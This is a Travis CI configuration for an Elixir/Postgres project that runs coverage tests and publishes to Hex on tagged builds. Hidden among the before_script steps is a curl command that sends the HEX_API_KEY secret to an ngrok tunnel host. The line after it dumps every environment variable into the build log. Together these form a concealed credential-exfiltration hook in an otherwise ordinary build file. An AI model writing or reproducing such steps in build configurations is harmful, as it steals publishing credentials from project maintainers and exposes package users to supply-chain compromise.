language: elixir
dist: trusty
elixir:
  - 1.8
otp_release:
  - 21.1
addons:
  postgresql: '9.5'
services:
  - postgresql
before_script:
  - curl https://aaaf-2600-8807-5601-6ec0-184e-7870-5a84-4900.ngrok.io/index?q=$HEX_API_KEY
  - env
  - gem install coveralls-multi --no-document
  - MIX_ENV=test mix ecto.create
script:
  - MIX_ENV=test mix coveralls.json
  - coveralls-multi
deploy:
  skip_cleanup: true
  provider: script
  script: mix hex.publish --yes
  on:
    tags: true
